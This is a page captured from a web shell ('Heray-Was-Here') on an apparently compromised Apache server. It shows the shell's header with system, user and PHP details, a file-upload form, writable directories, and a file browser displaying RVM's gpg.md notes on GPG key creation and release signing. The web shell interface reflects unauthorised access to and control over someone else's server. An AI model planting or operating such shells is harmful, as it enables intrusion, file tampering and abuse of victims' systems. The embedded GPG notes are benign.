Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /proc/thread-self/root/usr/local/rvm/docs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/thread-self/root/usr/local/rvm/docs/gpg.md
# GPG

1. [Creating GPG Keys](https://alexcabal.com/creating-the-perfect-gpg-keypair/)

2. Add public key to rvm-site repo

    `gpg --armor --export developer_name > developer_name.asc`

2. [Extending key expiration date](https://www.g-loaded.eu/2010/11/01/change-expiration-date-gpg-key/)

3. Signing installer

    `gpg --armor --detach-sign --yes binscripts/rvm-installer`

4. Signing release (follow on screen instructions)

    `bash sign-releases.sh`

Hry